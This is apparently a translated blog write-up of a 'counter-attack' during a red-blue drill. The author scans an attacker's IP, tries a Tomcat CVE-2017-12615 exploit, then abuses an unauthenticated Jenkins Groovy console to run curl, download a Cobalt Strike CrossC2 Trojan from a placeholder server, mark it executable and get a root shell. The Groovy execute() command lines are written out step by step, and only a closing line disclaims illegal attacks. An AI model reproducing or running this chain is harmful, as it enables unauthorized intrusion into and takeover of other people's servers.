Article directory
Preface
In an attack and defense drill, I traced the attacker’s IP, launched the CS Trojan through the existing vulnerability, and successfully got shell.
1. Find exploitable vulnerabilities
By collecting information on the attacker's IP, we found that the IP has multiple open ports.
Port 18080 (exploitation failed)
1. It was found to be the H3C ER5100G2 system management page, and the attempt to log in using a weak password failed.
2. After inputting multiple times, it was found that the password prompt y was obtained, but because the verification code cannot be reused, it cannot be cracked brute force.
Port 443 (exploitation failed)
It was found to be a login interface
and accessed incorrectly. I got apache tomcat/7.0.56
and tried to exploit the Tomcat remote code execution vulnerability (CVE-2017-12615)
using POC to verify 
. It was found that the vulnerability cannot be reproduced and has been fixed.
Port 12180 (exploited successfully)
Accessed port 12180 and found that there was an unauthorized access vulnerability. It was able to directly access the Jenkins backend of the website and perform multiple background operations. It was found that
there was a command line execution statement that could execute the Groovy script script.
It was found that root permissions were obtained.
2. Exploiting the vulnerability getshell
Use CS's CrossC2 plug-in to generate the Trojan horse "test".
The server side generates the web website
println "curl http://xxxxxx:8080/test -o /test".execute().text.
Download the Trojan horse test from the server
and execute println "ls -al" .execute().text Check that the test Trojan has appeared in the root directory, but there is no permission to execute it.
println “chmod +x /test”.execute().text gives Trojan permissions
Run the Trojan "test" and find that it went online successfully!
Check the obtained server exit IP and find that it is the same as the website IP . Check
the process through ps -ef and find the Jenkins process running on the website. Check
ifconfig and find that the name of the Ethernet card isHVVaddr
At this point, the attacker's server permissions have been successfully obtained.
Summarize
This article is a real record of attack and defense. Please surf the Internet in a civilized manner and in accordance with the law. Please do not illegally attack other people's websites.